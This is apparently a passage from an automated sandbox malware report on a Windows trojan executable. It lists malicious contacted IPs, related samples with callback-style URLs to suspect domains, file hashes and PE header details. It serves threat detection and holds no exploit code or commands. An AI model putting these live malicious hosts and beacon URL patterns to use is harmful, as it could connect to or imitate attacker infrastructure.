                                                                      http://www.fontbureau.com/designers/vBugmobiJh.exe, 00000001.00000003.215875793.0000000005760000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/sPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/jp/zPvBugmobiJh.exe, 00000001.00000003.214092584.0000000005725000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        198.185.159.144
                                                                        unknownUnited States
                                                                        53831SQUARESPACEUSfalse
                                                                        52.128.23.153
                                                                        unknownUnited States
                                                                        19324DOSARRESTUStrue
                                                                        34.102.136.180
                                                                        unknownUnited States
                                                                        15169GOOGLEUStrue
                                                                        154.80.226.18
                                                                        unknownSeychelles
                                                                        134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                        94.73.146.42
                                                                        unknownTurkey
                                                                        34619CIZGITRtrue

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:356496
                                                                        Start date:23.02.2021
                                                                        Start time:08:58:34
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 12m 7s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:vBugmobiJh.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:32
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@9/1@15/5
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 43.8% (good quality ratio 39.4%)
                                                                        • Quality average: 73.6%
                                                                        • Quality standard deviation: 31.9%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 168.61.161.212, 131.253.33.200, 13.107.22.200, 93.184.220.29, 23.210.249.50, 104.43.193.48, 92.122.145.220, 104.43.139.144, 52.255.188.83, 23.210.248.85, 51.104.144.132, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180
                                                                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        08:59:31API Interceptor1x Sleep call for process: vBugmobiJh.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        198.185.159.144SHED.EXEGet hashmaliciousBrowse
                                                                        • www.tomp3d.net/r8pp/?T8Vh=sK1DNTBFqnrDAEjJC5kiCuoZRuCrxJUK8uWX4HE4LqyCFvrnAwtCR7VNjd5adBJB+5ul&-ZPl=1bdpal
                                                                        4vnTrjsACd.rtfGet hashmaliciousBrowse
                                                                        • www.usmedicarenow.com/bw82/?RF=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&MpFxo=z4X81vGpK2z8
                                                                        FEB_2021.EXEGet hashmaliciousBrowse
                                                                        • www.magiclabs.media/bw82/?rp=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9Pxqw8Bg75uSCp&RR=YrHlp8D
                                                                        NNFYMCVABc.exeGet hashmaliciousBrowse
                                                                        • www.theatomicshots.com/xle/?Ppd=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns&BX=E0G8YpdxI8F
                                                                        q2o0a1neTm.exeGet hashmaliciousBrowse
                                                                        • www.theatomicshots.com/xle/?u6u4=hBWp7l4HSL7&MZQL=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns
                                                                        invoice.jpg.exeGet hashmaliciousBrowse
                                                                        • www.quantumsoundtherapy.info/jsw/?UtzP=GFQLLtYPWZplVZ&IfrXthQ=5e9NVW9syr8P9XSSCcw9PPY9meKGkrzS0YcQp6jXQzD/XwUeWOlBZP3dmv9HrmYsxpsg
                                                                        PR Agreement FEB2021.xlsxGet hashmaliciousBrowse
                                                                        • www.usmedicarenow.com/bw82/?rDHt=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&9rbPKt=zzr4Wp8XVp9
                                                                        ships documents.xlsxGet hashmaliciousBrowse
                                                                        • www.artisthenewmeditation.com/gqx2/?Czud=Dpp83ZapOz0DiPO&-Z7tZ=r/jg5sepAma4rZB3R6YWcuCeFVZouiCpBAkT8M+MS5l4cSJdb1sCs2PXH8wnC+lApn+oZQ==
                                                                        M0uy4pgQzd.exeGet hashmaliciousBrowse
                                                                        • www.theatomicshots.com/xle/?9rq=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSyJ+P4BMn6MYJMQQ==&4h0=vTR8SldxW2Clmhi
                                                                        INV_TMB_C108976.xlsxGet hashmaliciousBrowse
                                                                        • www.theatomicshots.com/xle/?erjl7vOP=dZpq/2Sexe9bjaltgMNZYhV3L/2Ns2NYRAlHzaSEv5WphfmA/yGGZ09CbyS0RfXwN6TbVg==&TB=8p50hjbp4rS43N
                                                                        q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                        • www.livisprogrammingadventure.com/w8en/?jrQDTX=IdRnP5iycLKMIZLMxzjK1mKkkcfwvyJhnPJgOKI25qH0jZkIFIOnsUp241V0RIqCRmvy&K2JxgH=Exop8hRXRdA
                                                                        YWrrcqVAno.exeGet hashmaliciousBrowse
                                                                        • www.magiclabs.media/bw82/?u8iLW=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9PxpQGRxbB01ju&OhNhA=9rUlSVPXQJJ
                                                                        wYpMWI3N52.exeGet hashmaliciousBrowse
                                                                        • www.teppeisugaya.com/p7t/?BlL=8T8LKpq1NrovzOWZxbE+5VRL+huCfHU9bKk3jO1v/3hQ4SgVI22Wd89Fmwic7Ahh4Z3r88CvIw==&a48=tXIxBn8h
                                                                        Agreement.xlsxGet hashmaliciousBrowse
                                                                        • www.usmedicarenow.com/bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0
                                                                        Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                        • www.soundon.events/csv8/?l48tdRq0=f1zFyjN0EmLviNF8fKKCz7YQnzvARTiViS3XLvwk6t41gXJpQ0SRSkWjGn1VRBwYOzEhaA==&RF=fra8
                                                                        xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                        • www.theatomicshots.com/xle/?-ZnD=LjoXU6n8-&iBrlPD=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSLWPv7Pa79MYJLDg==
                                                                        Inquiry_73834168_.xlsxGet hashmaliciousBrowse
                                                                        • www.sentire.design/incn/?9r_PU=-ZQLEn&e2Jdlzf8=5ltUxrttwFhptoEbwwSBkwhwumkFdmMXQM+4K6mrQNNQqM/0ADGIG+m5mhGMml3JysWX3Q==
                                                                        hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                        • www.magiclabs.media/bw82/?AjR=P2+pz5Ip5Thw4xSsr1TQmwqfNtgh4ua+i2k1cmEpjT3MKeCHzs63ua9PxpQsOBrBw3ru&ndnDnN=-Zh4gtKhzFrx
                                                                        Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                        • www.usmedicarenow.com/bw82/?KPO0Ltt0=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&GzuD_=dp5pdVbpjd
                                                                        PO210119.exe.exeGet hashmaliciousBrowse
                                                                        • www.edmondscakes.com/2kf/?9r4P2=J484&xPGHVhT0=9XMLlWJTI6vAfrHRazBeuJnX2zF/KKkFVijVc9HuNL/CE78GsXIW/AGNdR4jkREGsVcZ
                                                                        52.128.23.153CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?CneDg=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&Dxlpd=2dmp
                                                                        kgozmovHpY.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?6l=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&SX=clxhAzZHuDkt
                                                                        Quotation.exeGet hashmaliciousBrowse
                                                                        • www.zxr.xyz/uidr/?b6=OIh+/TUGYtHkksmH1NubrXk8ZEC83cFB3oCTZkko6fyplAOAg6boTSOjLerGQzPy4DZG&DbG=_DKdFj
                                                                        9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                                        • www.ztn.xyz/kre/?aR-8_FK0=/OmeH08klj8Emb5cHiqJz2STBy0Ye9mrU8ZXiQwG4LeQOsMJ7GfY8GRhQFFllHEDttjP&UlPt=DVohLl3xOrmlMF
                                                                        Q6h03zxheA.exeGet hashmaliciousBrowse
                                                                        • www.digitalqe.com/o8na/?j2JxtP=th2X0/zIHqAtzslZcArG5kD1owa9skBHDkLykKde96nSEltyU3QCQBf29olgqEuVXAq8&wXR=OZQhZV
                                                                        PO 213409701.xlsxGet hashmaliciousBrowse
                                                                        • www.stafffully.com/oean/?rFQt=+9WAEfQHyu5DxAQ+gadjC39SRpvqs9f27bZYIVY/K0MRnG/DHk6SppnSAP7rKZznuiHEQw==&rF=9rbPKz
                                                                        rwo02135.xlsGet hashmaliciousBrowse
                                                                        • www.bsf.xyz/krc/?L4rX=oSG3T25l4/YAqNLHPcXBvI98o2n2iP7ZIEME4K1keiBsyMfj22gUNUGLu0VeX478xnofWA==&mJE=DR-0XxipH
                                                                        Payment Advice_Pdf.exeGet hashmaliciousBrowse
                                                                        • www.commissary.xyz/dll/?TlW8=GvPH&aR-87Pm8=ULdTytqf2rQ7ZVckiKmBlBuvsRDYK7PoxU+BUyJc8vuwhBatel9ZbpqKUJ6SnOHYH2D/
                                                                        d6DdOfC2CX.exeGet hashmaliciousBrowse
                                                                        • www.stafffully.com/oean/?8pgPiXdx=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&a48=tXIxBnA8MdXL_
                                                                        hkcmd.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?FVWl=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&AlO=O2MtmfRxc
                                                                        WlBvCPCRcs.exeGet hashmaliciousBrowse
                                                                        • www.stafffully.com/oean/?YV8h-V18=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqXXR5HUhjS0&BBZ=OxlhVXB8mRxx4
                                                                        Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                        • www.stafffully.com/oean/?DvjTU=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&5j=UjPt
                                                                        gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?W6=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&odeTY=cnxhAP6x
                                                                        INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                        • www.telemedicinehamilton.com/ur06/?nt=ztK245chmnIywpDGI4ek/D+nW6cQvNzYzIHlYN6EpFuBe4trEXs3pNZL9gyKqZCfJgWX&2d=9rm4l4y
                                                                        SecuriteInfo.com.generic.ml.exeGet hashmaliciousBrowse
                                                                        • www.qpremodeling.com/kna/?xPIXBzFp=NoCfivEV1PLdrp8eYMZxLhQhAzIcUx+gSuDkoGiYoCEogO380D4Agw8IcsOOecu5pw3i&tXxh=J69Hp
                                                                        hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?AjR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&ndnDnN=-Zh4gtKhzFrx
                                                                        pY5XEdTwX7.exeGet hashmaliciousBrowse
                                                                        • www.digitalqe.com/o8na/?pPc=th2X0/zIHqAtzslZcArG5kD1owa9skBHDkLykKde96nSEltyU3QCQBf29olK10eVTCi8&Hpq=V6AHdRq0KFzPzJ
                                                                        inv.exeGet hashmaliciousBrowse
                                                                        • www.downdepot.com/hko6/?nt=mXCqokiU7aahy2Tl94RpXoHD4B1ok0f4qPPHxvq4K0GXA9n2t69xdHGs0dxLYqq3E6R+&sPXL3H=mnRly2QHp2o8
                                                                        PRS TT copy_pdf.exeGet hashmaliciousBrowse
                                                                        • www.globalefactory.com/s9zh/?uzul2=cfAP3dhEcu1Vi8J1aoBKUOXri8rpYHK2f4rCuERqPTnzLwFEaC7qLWEHuEMA0ziq3rYS&Oj9XRV=9rXLsjgpIh1
                                                                        SKM_C36821010708320.exeGet hashmaliciousBrowse
                                                                        • www.ehealthla.com/6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        www.wellnesssensation.comCMahQwuvAE.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        kgozmovHpY.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        hkcmd.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        2021 Additional Agreement.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        wDMBDrN663.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        KYC - 17DEC.xlsxGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        uM87pWnV44.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Xqgvj3afT1.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        at3nJkOFqF.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        www.thebabyfriendly.com7R29qUuJef.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        kgozmovHpY.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        2S6VUd960E.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        NEW AGREEMENT 19 01 2021.xlsxGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        u6uz950JO1.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        n1W2zlEddS.exeGet hashmaliciousBrowse
                                                                        • 154.80.226.18
                                                                        28zrX5JJmg.exeGet hashmaliciousBrowse
                                                                        • 108.62.32.237
                                                                        DEC 12-08 Wire.xlsxGet hashmaliciousBrowse
                                                                        • 108.62.32.237

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        GOOGLEUSORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        crypted.exeGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        NewOrder.xlsmGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order_20180218001.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 35.186.238.101
                                                                        ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        File Downloader [14.5].apkGet hashmaliciousBrowse
                                                                        • 142.250.186.74
                                                                        PO_210222.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        Order83930.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                        • 216.239.32.21
                                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                        • 142.250.186.33
                                                                        DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        xerox for hycite.htmGet hashmaliciousBrowse
                                                                        • 142.250.186.33
                                                                        rad875FE.tmp.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                                        • 34.102.136.180
                                                                        IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                                        • 35.200.172.247
                                                                        X1(1).xlsmGet hashmaliciousBrowse
                                                                        • 142.250.186.66
                                                                        IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                                        • 35.200.172.247
                                                                        SQUARESPACEUSPO-29840032.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        210222 Po No 10921-01.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        Shinshin Machinery.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        CMahQwuvAE.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        SHED.EXEGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        wFzMy6hehS.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        4vnTrjsACd.rtfGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Credit Card & Booking details.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        po.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        FEB_2021.EXEGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        2H2JIKQ8tN.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.145
                                                                        Shipping Doc.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        NNFYMCVABc.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        NdxPGuzTB9.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.145
                                                                        pfjgWtj6ms.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        q2o0a1neTm.exeGet hashmaliciousBrowse
                                                                        • 198.185.159.144
                                                                        Order 8953-PDF.exeGet hashmaliciousBrowse
                                                                        • 198.49.23.144
                                                                        DOSARRESTUSCMahQwuvAE.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        kgozmovHpY.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Quotation.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Q6h03zxheA.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        PO 213409701.xlsxGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        rwo02135.xlsGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Payment Advice_Pdf.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        d6DdOfC2CX.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        hkcmd.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        WlBvCPCRcs.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        gPGTcEMoM1.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        SecuriteInfo.com.generic.ml.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        pY5XEdTwX7.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        inv.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        PRS TT copy_pdf.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        SKM_C36821010708320.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vBugmobiJh.exe.log
                                                                        Process:C:\Users\user\Desktop\vBugmobiJh.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1314
                                                                        Entropy (8bit):5.350128552078965
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.409707473737011
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:vBugmobiJh.exe
                                                                        File size:484864
                                                                        MD5:5b59e521935e56a03255623df51c1631
                                                                        SHA1:b6714751ef5127dd84bed782a30eb44b7add8813
                                                                        SHA256:e6370f5f39e8e3d7a2506659786deadd1fe5ce8208cb2b6bf7748b6637a3b793
                                                                        SHA512:8d0717bce547dadb138b4f72a6219ea64cd3d07d790e4f1f5a7cec2d45cb280e0edcb6d286735ae6d539607ba8f75021b73913a37a1e23d9ba2e1e1c68bf6453
                                                                        SSDEEP:12288:NkYb2AUt9fvqbzYInHoSlujCXLpp1PFmPAtIeA5e13:9bif6zYMISl7tNmPMIza3
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.4`..............P..R...........p... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4770f6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x6034A02C [Tue Feb 23 06:26:52 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
